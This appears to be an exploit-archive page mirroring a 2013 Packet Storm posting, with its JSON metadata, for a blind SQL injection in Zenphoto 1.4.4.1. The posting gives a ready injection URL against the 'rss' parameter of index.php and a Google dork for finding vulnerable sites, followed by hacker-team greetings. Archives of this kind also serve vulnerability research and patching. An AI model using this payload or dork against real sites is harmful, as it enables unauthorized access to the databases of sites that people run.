Search...

Zenphoto 1.4.4.1 Blind SQL Injection

2013-02-20T00:00:00

ID PACKETSTORM:120422
Type packetstorm
Reporter Hossein Nsn
Modified 2013-02-20T00:00:00

Description

                                        
                                            `######################################################################################  
# #  
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection #  
# #  
# Author : HosseinNsn #  
# #  
# Home : http://Emperor-Team.Org #  
# #  
# Software Link : http://www.zenphoto.org #  
# #  
# Security Risk : High #  
# #  
# Version : 1.4.4.1 #  
# #  
# Tested on : Linux - Windows #  
# #  
# Google Dork : "Powered by Zenphoto" #  
# #  
######################################################################################  
# #  
# Exploit : #  
# #  
# [Target]/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection] #  
# #  
######################################################################################  
# #  
# SPL TNX : Mr.F@RDIN . Mr.Milad . Expl0!ter . arash 281 . ??.????@? . M?.MOHS3N #  
# #  
# Mr.SobhaN S[s]S . H0553|N7 . IrIsT . Mr.Treh . H@M3D . hono . EhsanAvr #  
# #  
# Invisible . bl4ckcod3r . MR.ARTAN . ??.??????? . WANTED . Mr.Amir #  
# #  
######################################################################################  
`

JSON Vulners Source

Initial Source

{"lastseen": "2016-11-03T10:21:35", "references": [], "description": "", "reporter": "Hossein Nsn", "published": "2013-02-20T00:00:00", "type": "packetstorm", "title": "Zenphoto 1.4.4.1 Blind SQL Injection", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:21:35", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:35", "rev": 2}, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-02-20T00:00:00", "id": "PACKETSTORM:120422", "href": "https://packetstormsecurity.com/files/120422/Zenphoto-1.4.4.1-Blind-SQL-Injection.html", "viewCount": 1, "sourceData": "`###################################################################################### \n# # \n# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection # \n# # \n# Author : HosseinNsn # \n# # \n# Home : http://Emperor-Team.Org # \n# # \n# Software Link : http://www.zenphoto.org # \n# # \n# Security Risk : High # \n# # \n# Version : 1.4.4.1 # \n# # \n# Tested on : Linux - Windows # \n# # \n# Google Dork : \"Powered by Zenphoto\" # \n# # \n###################################################################################### \n# # \n# Exploit : # \n# # \n# [Target]/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection] # \n# # \n###################################################################################### \n# # \n# SPL TNX : Mr.F@RDIN . Mr.Milad . Expl0!ter . arash 281 . ??.????@? . M?.MOHS3N # \n# # \n# Mr.SobhaN S[s]S . H0553|N7 . IrIsT . Mr.Treh . H@M3D . hono . EhsanAvr # \n# # \n# Invisible . bl4ckcod3r . MR.ARTAN . ??.??????? . WANTED . Mr.Amir # \n# # \n###################################################################################### \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/120422/zenphoto1441-sql.txt"}